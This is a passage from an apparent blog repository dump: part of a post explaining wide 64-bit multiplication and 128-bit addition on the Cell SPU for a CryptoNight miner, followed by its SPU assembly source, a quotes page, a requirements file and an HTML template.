33 | 0 16 32 48 64 80 96 112 128
34 | +--------+--------+--------+--------+--------+--------+--------+--------+
35 | a: | a0 | a1 | a2 | a3 | XX | XX | XX | XX |
36 | +--------+--------+--------+--------+--------+--------+--------+--------+
37 | +--------+--------+--------+--------+--------+--------+--------+--------+
38 | b: | b0 | b1 | b2 | b3 | XX | XX | XX | XX |
39 | +--------+--------+--------+--------+--------+--------+--------+--------+
40 | MSB LSB
41 | ```
42 |
43 | This is equivalent to the following representation:
44 |
45 | ```
46 | LHS := a3 + (a2 * 2^16) + (a1 * 2^32) + (a0 * 2^48)
47 | RHS := b3 + (b2 * 2^16) + (b1 * 2^32) + (b0 * 2^48)
48 | ```
49 |
50 | Applying the distributive property, the multiplication of both values should be equivalent to:
51 |
52 | ```
53 | LHS * RHS = (a3 + (a2 * 2^16) + (a1 * 2^32) + (a0 * 2^48)) *
54 | (b3 + (b2 * 2^16) + (b1 * 2^32) + (b0 * 2^48))
55 | = (a3*b3*2^00) + (a3*b2*2^16) + (a3*b1*2^32) + (a3*b0*2^48) +
56 | (a2*b3*2^16) + (a2*b2*2^32) + (a2*b1*2^48) + (a2*b0*2^64) +
57 | (a1*b3*2^32) + (a1*b2*2^48) + (a1*b1*2^64) + (a1*b0*2^80) +
58 | (a0*b3*2^48) + (a0*b2*2^64) + (a0*b1*2^80) + (a0*b0*2^96)
59 | ```
60 |
61 | Our implementation will perform these 16 multiplications of 16-bit words (`aX*bY`), shift the results (`*2^N`), and add everything together using 128-bit additions.
62 |
63 | ### Implementation
64 |
65 | First of all, let's recap the available multiplication operations in SPU (quoted from the *Synergistic Processor Unit Instruction Set Architecture v1.2*):
66 |
67 | > * `mpy rt,ra,rb`: **Multiply**. The signed 16 least significant bits of the corresponding word elements of registers `ra` and `rb` are multiplied, and the 32-bit products are placed in the corresponding word elements of register `rt`.
68 | > * `mpyhh rt,ra,rb`: **Multiply high high**. The signed 16 most significant bits of the word elements of registers `ra` and `rb` are multiplied, and the 32-bit products are placed in the corresponding word elements of register `rt`.
69 |
70 | When necessary, unsigned variants are available by adding an `u` suffix to the instruction name.
71 |
72 | #### 1. Multiplying half-words
73 |
74 | The distributive unfolding of the multiplication described earlier involves multiplying 16 half-words pairs into 16 words. Each multiplication instruction yields a maximum of 4 32-bit words, but since only 64-bits are used in `a` and `b`, only 2 are useful.
75 |
76 | To minimize the number of multiplications, we can duplicate/shuffle half-words to the unused 64-bits of the quad-word via `shufb` as follows (this step can also be used to switch endianness, if necessary):
77 |
78 | ```
79 | 0 16 32 48 64 80 96 112 128
80 | +--------+--------+--------+--------+--------+--------+--------+--------+
81 | a: | a0 | a1 | a2 | a3 | a2 | a3 | a0 | a1 |
82 | +--------+--------+--------+--------+--------+--------+--------+--------+
83 | +--------+--------+--------+--------+--------+--------+--------+--------+
84 | b: | b0 | b1 | b2 | b3 | b0 | b1 | b2 | b3 |
85 | +--------+--------+--------+--------+--------+--------+--------+--------+
86 | MSB LSB
87 | ```
88 |
89 | Additionally, we left-shift by 16 both `a`, `b` into `c`, `d` respectively, to do high-low multiplications (similarly to the `mpyh` instruction but without post-shifting). It does not matter whether the least significant half-word is zeroed. The result is:
90 |
91 | ```
92 | 0 16 32 48 64 80 96 112 128
93 | +--------+--------+--------+--------+--------+--------+--------+--------+
94 | c: | a1 | (a2) | a3 | (a2) | a3 | (a0) | a1 | (00) |
95 | +--------+--------+--------+--------+--------+--------+--------+--------+
96 | +--------+--------+--------+--------+--------+--------+--------+--------+
97 | d: | b1 | (b2) | b3 | (b0) | b1 | (b2) | b3 | (00) |
98 | +--------+--------+--------+--------+--------+--------+--------+--------+
99 | MSB LSB
100 | ```
101 |
102 | This way we can generate all necessary multiplications as follows:
103 |
104 | ```
105 | mpy t0, a, b
106 | mpyhh t1, a, d
107 | mpyhh t2, b, c
108 | mpyhh t3, a, b
109 | ```
110 |
111 | Leaving us with the following results:
112 |
113 | ```
114 | 0 16 32 48 64 80 96 112 128
115 | +--------+--------+--------+--------+--------+--------+--------+--------+
116 | t0 | a1 * b1 | a3 * b3 | a3 * b1 | a1 * b3 |
117 | +--------+--------+--------+--------+--------+--------+--------+--------+
118 | +--------+--------+--------+--------+--------+--------+--------+--------+
119 | t1 | a0 * b1 | a2 * b3 | a2 * b1 | a0 * b3 |
120 | +--------+--------+--------+--------+--------+--------+--------+--------+
121 | +--------+--------+--------+--------+--------+--------+--------+--------+
122 | t2 | b0 * a1 | b2 * a3 | b0 * a3 | b2 * a1 |
123 | +--------+--------+--------+--------+--------+--------+--------+--------+
124 | +--------+--------+--------+--------+--------+--------+--------+--------+
125 | t3 | a0 * b0 | a2 * b2 | a2 * b0 | a0 * b2 |
126 | +--------+--------+--------+--------+--------+--------+--------+--------+
127 | MSB LSB
128 | ```
129 |
130 | #### 2. Shuffling half-words
131 |
132 | Before adding each of these 16 words, we need to multiply each by the corresponding power of 2 computed previously (i.e. shifting by a certain amount in bits). These constants are:
133 |
134 | ```
135 | 0 16 32 48 64 80 96 112 128
136 | +--------+--------+--------+--------+--------+--------+--------+--------+
137 | t0 | t00 64 | t01 0 | t02 32 | t03 32 |
138 | +--------+--------+--------+--------+--------+--------+--------+--------+
139 | +--------+--------+--------+--------+--------+--------+--------+--------+
140 | t1 | t10 80 | t11 16 | t12 48 | t13 48 |
141 | +--------+--------+--------+--------+--------+--------+--------+--------+
142 | +--------+--------+--------+--------+--------+--------+--------+--------+
143 | t2 | t20 80 | t21 16 | t22 48 | t23 48 |
144 | +--------+--------+--------+--------+--------+--------+--------+--------+
145 | +--------+--------+--------+--------+--------+--------+--------+--------+
146 | t3 | t30 96 | t31 32 | t32 64 | t33 64 |
147 | +--------+--------+--------+--------+--------+--------+--------+--------+
148 | MSB LSB
149 | ```
150 |
151 | We need to move these words into their proper locations (note that some words like `t02` or `t30` are already well placed). Using scratch registers is necessary, since working directly on {t0, t1, t2, t3} would cause bits to get lost due to overlaps. Doing this naively would involve using 16 scratch registers, i.e. 16 128-bit integers to be added later on.
152 |
153 | However, by shuffling bytes via `shufb` we can bring this down to only 7 scratch registers:
154 |
155 | ```
156 | 128 112 96 80 64 48 32 16 0
157 | +--------+--------+--------+--------+--------+--------+--------+--------+
158 | v0 | | ##### t00 ##### | ##### t02 ##### | ##### t01 ##### |
159 | +--------+--------+--------+--------+--------+--------+--------+--------+
160 | +--------+--------+--------+--------+--------+--------+--------+--------+
161 | v1 | ##### t30 ##### | ##### t32 ##### | ##### t31 ##### | |
162 | +--------+--------+--------+--------+--------+--------+--------+--------+
163 | +--------+--------+--------+--------+--------+--------+--------+--------+
164 | v2 | | ##### t33 ##### | ##### t03 ##### | |
165 | +--------+--------+--------+--------+--------+--------+--------+--------+
166 | +--------+--------+--------+--------+--------+--------+--------+--------+
167 | v3 | | ##### t10 ##### | ##### t12 ##### | ##### t11 ##### | |
168 | +--------+--------+--------+--------+--------+--------+--------+--------+
169 | +--------+--------+--------+--------+--------+--------+--------+--------+
170 | v4 | | ##### t20 ##### | ##### t22 ##### | ##### t21 ##### | |
171 | +--------+--------+--------+--------+--------+--------+--------+--------+
172 | +--------+--------+--------+--------+--------+--------+--------+--------+
173 | v5 | | ##### t13 ##### | |
174 | +--------+--------+--------+--------+--------+--------+--------+--------+
175 | +--------+--------+--------+--------+--------+--------+--------+--------+
176 | v6 | | ##### t23 ##### | |
177 | +--------+--------+--------+--------+--------+--------+--------+--------+
178 | MSB LSB
179 | ```
180 |
181 | This is accomplished by the following operations (note that only 5 shuffle masks are necessary):
182 |
183 | ```
184 | shufb v0, t0, t0, mask_v0
185 | shufb v1, t3, t3, mask_v1
186 | shufb v2, t0, t3, mask_v2
187 | shufb v3, t1, t1, mask_v3_v4
188 | shufb v4, t2, t2, mask_v3_v4
189 | shufb v5, t1, t1, mask_v5_v6
190 | shufb v6, t2, t2, mask_v5_v6
191 | ```
192 |
193 | #### 3. Adding results
194 |
195 | The final step is adding the 7 resulting 28-bit words {v0, ..., v6} as described by the algorithm "*Addition (128-bit)*". Let such algorithm be implemented by the macro `add_128(output, lhs, rhs)`. The final result `r` of the multiplication algorithm is computed as follows:
196 |
197 | ```
198 | add_128 t0, v0, v1
199 | add_128 t1, v2, v3
200 | add_128 t2, v4, v5
201 | add_128 t0, t0, t1
202 | add_128 t0, t0, t2
203 | add_128 r, t0, v6
204 | ```
205 |
206 | As a final step, one might shuffle bytes again to match the desired endianness.
207 |
208 | ## Addition (128-bit)
209 |
210 | During the implementation of "*Multiplication (64-bit)*" we required a 128-bit + 128-bit integer addition that results in a 128-bit integer, but the largest granularity we can achieve for additions in SPUs is 32-bit. Although our approach here is relatively straightforward, we document it here for the sake of completeness.
211 |
212 | ### Theory
213 |
214 | Consider the `a` and `b` input registers and the `s` output register, the 128-bit LHS and RHS of the addition operation composed of the 32-bit words [a0, a1, a2, a3] and [b0, b1, b2, b3], respectively.
215 |
216 | ```
217 | 0 32 64 96 128
218 | +-----------------+-----------------+-----------------+-----------------+
219 | a: | a0 | a1 | a2 | a3 |
220 | +-----------------+-----------------+-----------------+-----------------+
221 | +-----------------+-----------------+-----------------+-----------------+
222 | b: | b0 | b1 | b2 | b3 |
223 | +-----------------+-----------------+-----------------+-----------------+
224 | MSB LSB
225 | ```
226 |
227 | This is equivalent to the following representation:
228 |
229 | ```
230 | LHS := a3 + (a2 * 2^32) + (a1 * 2^64) + (a0 * 2^96)
231 | RHS := b3 + (b2 * 2^32) + (b1 * 2^64) + (b0 * 2^96)
232 | ```
233 |
234 | Similar to four-bit adder, we perform the addition component-wise propagating the carry bit from the LSW to the MSW. We represent this carry-bit with the `overflow` (shortened as `o`), that takes an addition result and outputs 1 if the addition is >= 2^32, and 0 otherwise.
235 |
236 | ```
237 | s3 = a3 + b3
238 | s2 = a2 + b2 + overflow(s3)
239 | s1 = a1 + b1 + overflow(s2)
240 | s0 = a0 + b0 + overflow(s1)
241 | ```
242 |
243 | ### Implementation
244 |
245 | First of all, let's recap the available multiplication operations in SPU (quoted from the *Synergistic Processor Unit Instruction Set Architecture v1.2*):
246 |
247 | > * `a rt,ra,rb`: **Add Word**. Each word element of register `ra` is added to the corresponding word element of register `rb`, and the results are placed in the corresponding word elements of register `rt`.
248 | > * `cg rt,ra,rb`: **Carry Generate**. Each word element of register `ra` is added to the corresponding word element of register `rb`. The carry out is placed in the least significant bit of the corresponding word element of register `rt`, and 0 is placed in the remaining bits of `rt`.
249 | > * `shlqbyi rt,ra,value`: **Shift Left Quadword by Bytes Immediate**. The contents of register `ra` are shifted left by the number of bytes specified by the unsigned 5-bit `value`. The result is placed in register `rt`.
250 |
251 | #### 1. Basic idea
252 |
253 | By using these instructions, we can perform this addition as follows:
254 |
255 | ```
256 | +-----------------+-----------------+-----------------+-----------------+
257 | t0 | t00: a0 + b0 | t01: a1 + b1 | t02: a2 + b2 | t03: a3 + b3 |
258 | +-----------------+-----------------+-----------------+-----------------+
259 | c0 | c00: o(a1 + b1) | c01: o(a2 + b2) | c02: o(a3 + b3) | |
260 | +-----------------+-----------------+-----------------+-----------------+
261 | +-----------------+-----------------+-----------------+-----------------+
262 | t1 | t10: t00+c00 | t11: t01+c01 | t12: t02+c02 | |
263 | +-----------------+-----------------+-----------------+-----------------+
264 | c1 | c10: o(t01+c01) | c11: o(t02+c02) | | |
265 | +-----------------+-----------------+-----------------+-----------------+
266 | +-----------------+-----------------+-----------------+-----------------+
267 | t2 | t20: t10+c10 | t21: t11+c11 | | |
268 | +-----------------+-----------------+-----------------+-----------------+
269 | c2 | c20: o(t11+c11) | | | |
270 | +-----------------+-----------------+-----------------+-----------------+
271 | +-----------------+-----------------+-----------------+-----------------+
272 | t3 | t30: t20+c20 | | | |
273 | +-----------------+-----------------+-----------------+-----------------+
274 | ```
275 |
276 | Here, at each iteration *N = {0,1,2,3}*, the temporary variable *tN* contains the 32-bit componentwise addition of *tN-1* and *cN-1*. This can easily be done with the `a` instruction described before. The temporary variables *cN* contain the word-shifted carry bit of said addition, which can be achieved by a combination of the `cg` and `shlqbyi` instructions.
277 |
278 | This process is kickstarted by computing the addition and shifted overflow of the original LHS and RHS components into the *t0* and *c0* registers respectively. The final output register `r` can simply be computed as [t30, t21, t12, t03].
279 |
280 | #### 2. Optimizing register usage
281 |
282 | By analyzing dependencies, you might observe that no more than 3 temporary variables are used at any time. Let's redefine these as `t0`, `t1`, `t2`. Additionally, given that left-shifts are always zero-extended, we can preserve the LSWs as we "carry on" with the computation (no pun intended), saving us from cherry-picking words from different temporaries into `r`.
283 |
284 | The final algorithm would look like this:
285 |
286 | ```
287 | cg t1, lhs, rhs
288 | a t0, lhs, rhs
289 | shlqbyi t1, t1, 4
290 | cg t2, t0, t1
291 | a t0, t0, t1
292 | shlqbyi t2, t2, 4
293 | cg t1, t0, t2
294 | a t0, t0, t2
295 | shlqbyi t1, t1, 4
296 | a r, t0, t1
297 | ```
298 |
299 | Note that the same approach is used to perform 64-bit additions, required in CryptoNight's Memory-Hard Loop.
300 |
301 | ## Sources
302 |
303 | You can find the source code for these implementations in: [`arithmetic.s`](arithmetic.s).
304 |
--------------------------------------------------------------------------------
/posts/2019-02-16-cell-miner-alu/arithmetic.s:
--------------------------------------------------------------------------------
1 | /**
2 | * SPU high-performance wide arithmetic.
3 | * Author: Alexandro Sanchez Bach .
4 | */
5 |
6 | // Registers
7 |
8 | #define alu_reg_se32 $80
9 | #define alu_reg_se64 $81
10 | #define alu_reg_se128 $82
11 | #define alu_reg_mul_lhs $83
12 | #define alu_reg_mul_rhs $84
13 | #define alu_reg_mul_m0 $85
14 | #define alu_reg_mul_m1 $86
15 | #define alu_reg_mul_m2 $87
16 | #define alu_reg_mul_m3 $88
17 | #define alu_reg_mul_m4 $89
18 | #define alu_reg_add_m64 $90
19 |
20 | #define alu_reg_i0 $40
21 | #define alu_reg_i1 $41
22 | #define alu_reg_t0 $42
23 | #define alu_reg_t1 $43
24 | #define alu_reg_t2 $44
25 | #define alu_reg_t3 $45
26 | #define alu_reg_v0 $46
27 | #define alu_reg_v1 $47
28 | #define alu_reg_v2 $48
29 | #define alu_reg_v3 $49
30 | #define alu_reg_v4 $50
31 | #define alu_reg_v5 $51
32 | #define alu_reg_v6 $52
33 |
34 | // Constants
35 |
36 | .align 4
37 | .global alu_endian
38 | alu_endian:
39 | // swap-endian-32
40 | .byte 0x03, 0x02, 0x01, 0x00, 0x07, 0x06, 0x05, 0x04
41 | .byte 0x0B, 0x0A, 0x09, 0x08, 0x0F, 0x0E, 0x0D, 0x0C
42 | // swap-endian-64
43 | .byte 0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00
44 | .byte 0x0F, 0x0E, 0x0D, 0x0C, 0x0B, 0x0A, 0x09, 0x08
45 | // swap-endian-128
46 | .byte 0x0F, 0x0E, 0x0D, 0x0C, 0x0B, 0x0A, 0x09, 0x08
47 | .byte 0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00
48 |
49 | .align 4
50 | .global alu_wswap
51 | alu_wswap:
52 | // mul_lhs: switch endian, then word swap [0,1,2,3] -> [0,1,1,0]
53 | .byte 0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00
54 | .byte 0x03, 0x02, 0x01, 0x00, 0x07, 0x06, 0x05, 0x04
55 | // mul_rhs: switch endian, then word swap [0,1,2,3] -> [0,1,0,1]
56 | .byte 0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00
57 | .byte 0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00
58 |
59 | .align 4
60 | .global alu_mul64_constants
61 | alu_mul64_constants:
62 | // v0
63 | .byte 0x80, 0x80, 0x80, 0x80, 0x00, 0x01, 0x02, 0x03
64 | .byte 0x08, 0x09, 0x0A, 0x0B, 0x04, 0x05, 0x06, 0x07
65 | // v1
66 | .byte 0x00, 0x01, 0x02, 0x03, 0x08, 0x09, 0x0A, 0x0B
67 | .byte 0x04, 0x05, 0x06, 0x07, 0x80, 0x80, 0x80, 0x80
68 | // v2
69 | .byte 0x80, 0x80, 0x80, 0x80, 0x1C, 0x1D, 0x1E, 0x1F
70 | .byte 0x0C, 0x0D, 0x0E, 0x0F, 0x80, 0x80, 0x80, 0x80
71 | // v3+v4
72 | .byte 0x80, 0x80, 0x00, 0x01, 0x02, 0x03, 0x08, 0x09
73 | .byte 0x0A, 0x0B, 0x04, 0x05, 0x06, 0x07, 0x80, 0x80
74 | // v5+v6
75 | .byte 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x0C, 0x0D
76 | .byte 0x0E, 0x0F, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80
77 |
78 | .align 4
79 | .global alu_add64_constants
80 | alu_add64_constants:
81 | .byte 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00
82 | .byte 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00
83 |
84 | // Macros
85 |
86 | #define add_64(ret, lhs, rhs) \
87 | shufb alu_reg_t0, lhs, lhs, alu_reg_se64 ;\
88 | shufb alu_reg_t1, rhs, rhs, alu_reg_se64 ;\
89 | cg alu_reg_t2, alu_reg_t0, alu_reg_t1 ;\
90 | a alu_reg_t0, alu_reg_t0, alu_reg_t1 ;\
91 | shlqbyi alu_reg_t2, alu_reg_t2, 4 ;\
92 | and alu_reg_t2, alu_reg_t2, alu_reg_add_m64 ;\
93 | a alu_reg_t0, alu_reg_t0, alu_reg_t2 ;\
94 | shufb ret, alu_reg_t0, alu_reg_t0, alu_reg_se64 ;
95 |
96 | #define add_128(ret, lhs, rhs) \
97 | cg alu_reg_t1, lhs, rhs ;\
98 | a alu_reg_t0, lhs, rhs ;\
99 | shlqbyi alu_reg_t1, alu_reg_t1, 4 ;\
100 | cg alu_reg_t2, alu_reg_t0, alu_reg_t1 ;\
101 | a alu_reg_t0, alu_reg_t0, alu_reg_t1 ;\
102 | shlqbyi alu_reg_t2, alu_reg_t2, 4 ;\
103 | cg alu_reg_t1, alu_reg_t0, alu_reg_t2 ;\
104 | a alu_reg_t0, alu_reg_t0, alu_reg_t2 ;\
105 | shlqbyi alu_reg_t1, alu_reg_t1, 4 ;\
106 | a ret, alu_reg_t0, alu_reg_t1 ;
107 |
108 | #define mul_64(ret, lhs, rhs) \
109 | shufb alu_reg_i0, lhs, lhs, alu_reg_mul_lhs ;\
110 | shufb alu_reg_i1, rhs, rhs, alu_reg_mul_rhs ;\
111 | shli alu_reg_v0, alu_reg_i0, 16 ;\
112 | shli alu_reg_v1, alu_reg_i1, 16 ;\
113 | mpyu alu_reg_t0, alu_reg_i0, alu_reg_i1 ;\
114 | mpyhhu alu_reg_t1, alu_reg_i0, alu_reg_v1 ;\
115 | mpyhhu alu_reg_t2, alu_reg_i1, alu_reg_v0 ;\
116 | mpyhhu alu_reg_t3, alu_reg_i0, alu_reg_i1 ;\
117 | shufb alu_reg_v0, alu_reg_t0, alu_reg_t0, alu_reg_mul_m0 ;\
118 | shufb alu_reg_v1, alu_reg_t3, alu_reg_t3, alu_reg_mul_m1 ;\
119 | shufb alu_reg_v2, alu_reg_t0, alu_reg_t3, alu_reg_mul_m2 ;\
120 | shufb alu_reg_v3, alu_reg_t1, alu_reg_t1, alu_reg_mul_m3 ;\
121 | shufb alu_reg_v4, alu_reg_t2, alu_reg_t2, alu_reg_mul_m3 ;\
122 | shufb alu_reg_v5, alu_reg_t1, alu_reg_t1, alu_reg_mul_m4 ;\
123 | shufb alu_reg_v6, alu_reg_t2, alu_reg_t2, alu_reg_mul_m4 ;\
124 | add_128(alu_reg_v0, alu_reg_v0, alu_reg_v1) ;\
125 | add_128(alu_reg_v2, alu_reg_v2, alu_reg_v3) ;\
126 | add_128(alu_reg_v4, alu_reg_v4, alu_reg_v5) ;\
127 | add_128(alu_reg_v0, alu_reg_v0, alu_reg_v2) ;\
128 | add_128(alu_reg_v0, alu_reg_v0, alu_reg_v4) ;\
129 | add_128(alu_reg_v0, alu_reg_v0, alu_reg_v6) ;\
130 | shufb ret, alu_reg_v0, alu_reg_v0, alu_reg_se64 ;
131 |
132 | // Functions
133 |
134 | .global alu_constants_init
135 | .type alu_constants_init, @function
136 | alu_constants_init:
137 | ila alu_reg_t0, alu_endian
138 | lqd alu_reg_se32, 0x00(alu_reg_t0)
139 | lqd alu_reg_se64, 0x10(alu_reg_t0)
140 | lqd alu_reg_se128, 0x20(alu_reg_t0)
141 | ila alu_reg_t0, alu_wswap
142 | lqd alu_reg_mul_lhs, 0x00(alu_reg_t0)
143 | lqd alu_reg_mul_rhs, 0x10(alu_reg_t0)
144 | ila alu_reg_t0, alu_mul64_constants
145 | lqd alu_reg_mul_m0, 0x00(alu_reg_t0)
146 | lqd alu_reg_mul_m1, 0x10(alu_reg_t0)
147 | lqd alu_reg_mul_m2, 0x20(alu_reg_t0)
148 | lqd alu_reg_mul_m3, 0x30(alu_reg_t0)
149 | lqd alu_reg_mul_m4, 0x40(alu_reg_t0)
150 | ila alu_reg_t0, alu_add64_constants
151 | lqd alu_reg_add_m64, 0x00(alu_reg_t0)
152 | bi $lr
153 |
--------------------------------------------------------------------------------
/posts/2024-04-28-quotes/_main.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: live
3 | date: 2024-04-28
4 | title: Quotes
5 | author: Alexandro Sanchez
6 | ---
7 |
8 | "Wir müssen wissen. Wir werden wissen." — David Hilbert
9 |
10 | "Everyone who confuses correlation with causation eventually ends up dead." — Alan Cooper
11 |
12 | "I like offending people, because I think the people who get offended should be offended." — Linus Torvalds
13 |
14 | "The less confident you are, the more serious you have to act." — Tara Ploughman
15 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | markdown==3.3.3
2 | pygments==2.15.0
3 |
--------------------------------------------------------------------------------
/templates/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | Blog
7 |
8 |
9 |
10 |
37 |
38 |
39 |
40 |